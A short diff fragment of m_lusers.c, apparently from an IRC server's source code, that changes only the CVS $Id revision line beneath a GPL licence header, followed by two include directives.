  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: m_lusers.c,v 1.16 2001/04/09 12:41:49 fl_ Exp $
+ *   $Id: m_lusers.c,v 1.1.1.1 2001/06/05 16:35:45 demond Exp $
  */
 #include "handlers.h"
 #include "client.h"
